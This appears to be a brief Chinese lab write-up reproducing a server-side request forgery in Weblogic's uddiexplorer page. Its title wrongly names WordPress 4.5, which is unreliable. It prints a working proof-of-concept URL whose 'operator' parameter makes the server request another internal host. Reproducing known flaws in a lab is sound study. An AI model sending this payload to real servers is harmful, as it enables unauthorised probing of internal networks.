漏洞復現 | WordPress _4.5 SSRF

  • 2019 年 10 月 7 日
  • 筆記

一、環境搭建

https://www.cnblogs.com/0x4D75/p/8916428.html#%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85weblogic

經過了千辛萬苦,修改了無數次啟動文件,終於啟動了weblogic

二、Weblogic SSRF漏洞復現

構造POC:http://172.16.1.139:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.1.107:23333

可以看到瀏覽器向其他主機發送了一條請求,復現成功!